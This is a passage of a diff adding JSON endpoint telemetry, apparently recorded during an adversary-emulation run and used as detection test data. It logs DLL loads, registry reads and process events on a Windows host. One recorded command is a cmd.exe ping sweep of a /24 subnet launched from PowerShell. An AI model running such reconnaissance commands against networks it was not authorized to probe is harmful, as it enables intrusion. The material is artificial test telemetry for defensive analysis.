+ "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1744, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571956210000, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1744, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571956210000, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 1744, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571956210000, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 1744, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571956210000, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" + }, + { + "event_type": "image_load", + "image_name": "mpr.dll", + "image_path": "C:\\Windows\\System32\\mpr.dll", + "pid": 1744, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571956210000, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1744, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571956210000, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" + }, + { + "event_type": "image_load", + "image_name": "wkscli.dll", + "image_path": "C:\\Windows\\System32\\wkscli.dll", + "pid": 1744, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571956210000, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" + }, + { + "event_type": "image_load", + "image_name": "netutils.dll", + "image_path": "C:\\Windows\\System32\\netutils.dll", + "pid": 1744, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571956210000, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 1744, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571956210000, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 1744, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571956210000, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" + }, + { + "event_type": "image_load", + "image_name": "samcli.dll", + "image_path": "C:\\Windows\\System32\\samcli.dll", + "pid": 1744, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571956210000, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" + }, + { + "event_type": "image_load", + "image_name": "srvcli.dll", + "image_path": "C:\\Windows\\System32\\srvcli.dll", + "pid": 1744, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571956210000, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 1744, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571956210000, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" + }, + { + "event_type": "image_load", + "image_name": "bcrypt.dll", + "image_path": "C:\\Windows\\System32\\bcrypt.dll", + "pid": 1744, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571956210000, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 1744, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571956360000, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" + }, + { + "event_type": "image_load", + "image_name": "browcli.dll", + "image_path": "C:\\Windows\\System32\\browcli.dll", + "pid": 1744, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571956360000, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" + }, + { + "event_type": "image_load", + "image_name": "cscapi.dll", + "image_path": "C:\\Windows\\System32\\cscapi.dll", + "pid": 1744, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883571956360000, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" + }, + { + "event_type": "registry", + "pid": 2664, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\IdentityCRL", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\IdentityCRL\\ClockData", + "registry_value": "ClockData", + "timestamp": 131883571967310016, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}" + }, + { + "event_type": "image_load", + "image_name": "OnDemandConnRouteHelper.dll", + "image_path": "C:\\Windows\\System32\\OnDemandConnRouteHelper.dll", + "pid": 2664, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883571967310016, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}" + }, + { + "event_type": "registry", + "pid": 2164, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", + "registry_value": "Connections", + "timestamp": 131883571967310016, + "unique_pid": "{42FC7E13-B2AC-5C05-0000-0010E9B00100}" + }, + { + "event_type": "registry", + "pid": 2664, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Root", + "registry_value": "Root", + "timestamp": 131883571968400000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}" + }, + { + "event_type": "registry", + "pid": 2664, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\CA", + "registry_value": "CA", + "timestamp": 131883571968400000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}" + }, + { + "event_type": "registry", + "pid": 2664, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Diagnostics", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Diagnostics\\DiagTrack", + "registry_value": "DiagTrack", + "timestamp": 131883571969650000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}" + }, + { + "event_type": "registry", + "pid": 2664, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Diagnostics\\DiagTrack", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Diagnostics\\DiagTrack\\LastSuccessfulUploadTime", + "registry_value": "LastSuccessfulUploadTime", + "timestamp": 131883571969650000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}" + }, + { + "event_type": "registry", + "pid": 2664, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Diagnostics", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Diagnostics\\DiagTrack", + "registry_value": "DiagTrack", + "timestamp": 131883571969650000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}" + }, + { + "event_type": "registry", + "pid": 2664, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Diagnostics\\DiagTrack", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Diagnostics\\DiagTrack\\LastSuccessfulNormalUploadTime", + "registry_value": "LastSuccessfulNormalUploadTime", + "timestamp": 131883571969650000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}" + }, + { + "destination_address": "52.114.128.8", + "destination_port": "443", + "event_type": "network", + "pid": 2664, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "protocol": "tcp", + "source_address": "192.168.162.134", + "source_port": "50504", + "subtype": "outgoing", + "timestamp": 131883571967820000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001066040200}", + "user": "NT AUTHORITY\\SYSTEM", + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "event_type": "process", + "pid": 1744, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "subtype": "terminate", + "timestamp": 131883572002150000, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-00109C625101}" + }, + { + "event_type": "process", + "pid": 8124, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883572002150000, + "unique_pid": "{42FC7E13-CB4B-5C05-0000-0010A0615101}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 3276, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883572002260000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-00102B675101}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3276, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883572002150000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-00102B675101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3276, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883572002150000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-00102B675101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3276, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883572002150000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-00102B675101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3276, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883572002150000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-00102B675101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3276, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883572002300000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-00102B675101}" + }, + { + "event_type": "process", + "pid": 3276, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883572002300000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-00102B675101}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"for /l %%i in (1,1,254) do ping -n 1 -w 100 192.168.1.%%i\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 7328, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883572002880000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7328, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883572002770000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010896B5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7328, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883572002770000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010896B5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7328, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883572002770000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010896B5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7328, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883572002770000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010896B5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7328, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883572002770000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010896B5101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.1", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6948, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572003000000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010876C5101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6948, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572002920000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010876C5101}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883572002920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883572002920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883572002920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6948, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572002920000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010876C5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6948, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572002920000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010876C5101}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6948, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572002920000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010876C5101}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6948, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572003080000, + "unique_pid": "{42FC7E13-CB50-5C05-0000-0010876C5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": 